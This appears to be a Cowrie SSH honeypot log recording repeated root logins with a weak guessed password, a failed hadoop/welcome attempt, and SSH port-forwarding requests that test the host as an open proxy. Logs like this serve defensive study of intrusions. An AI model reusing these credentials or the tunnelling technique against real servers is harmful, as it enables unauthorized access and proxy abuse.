{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.383316Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.434074Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.685683Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":9865,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:9865","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.736849Z","session":"60d6814f0934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.787152Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":12979,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12979","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.928642Z","session":"60d6814f0934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.979082Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":25659,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25659","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.120727Z","session":"60d6814f0934"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.171098Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.222393Z","src_ip":"77.83.207.83","session":"60d6814f0934"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52015,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d308c449e8c","protocol":"ssh","message":"New connection: 77.83.207.83:52015 (1.2.3.4:22) [session: 5d308c449e8c]","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.272816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.273647Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.325645Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"welcome","message":"login attempt [hadoop/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.372424Z","src_ip":"212.227.235.229","session":"9fb704ece54f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.585769Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31482,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:31482","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.638651Z","session":"5d308c449e8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.690838Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":188,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:188","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.838306Z","session":"5d308c449e8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:54.890274Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":4748,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4748","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.034345Z","session":"5d308c449e8c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.086316Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.139334Z","src_ip":"77.83.207.83","session":"5d308c449e8c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52131,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fdfc7393b11","protocol":"ssh","message":"New connection: 77.83.207.83:52131 (1.2.3.4:22) [session: 4fdfc7393b11]","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.187946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.197799Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.237932Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.486239Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16698,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16698","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.537246Z","session":"4fdfc7393b11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.587179Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":11056,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:11056","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.728154Z","session":"4fdfc7393b11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.778029Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":16849,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16849","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.920122Z","session":"4fdfc7393b11"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:55.970386Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.021074Z","src_ip":"77.83.207.83","session":"4fdfc7393b11"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52223,"dst_ip":"1.2.3.4","dst_port":22,"session":"302eec2164c9","protocol":"ssh","message":"New connection: 77.83.207.83:52223 (1.2.3.4:22) [session: 302eec2164c9]","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.069641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.070604Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.120406Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.367335Z","src_ip":"212.227.235.229","session":"9fb704ece54f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.368379Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32506,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32506","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.418774Z","session":"302eec2164c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.468430Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":13147,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13147","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.608177Z","session":"302eec2164c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.658153Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":7361,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:7361","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.799903Z","session":"302eec2164c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.849740Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.900383Z","src_ip":"77.83.207.83","session":"302eec2164c9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":52318,"dst_ip":"1.2.3.4","dst_port":22,"session":"544526ee6f3c","protocol":"ssh","message":"New connection: 77.83.207.83:52318 (1.2.3.4:22) [session: 544526ee6f3c]","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.953346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:56.954017Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.007716Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.273909Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11146,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11146","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.328350Z","session":"544526ee6f3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.382458Z","src_ip":"77.83.207.83","session":"544526ee6f3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":22740,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:22740","sensor":"my-vps","timestamp":"2025-08-31T03:45:57.531856Z","session":"544526ee6f3c"}
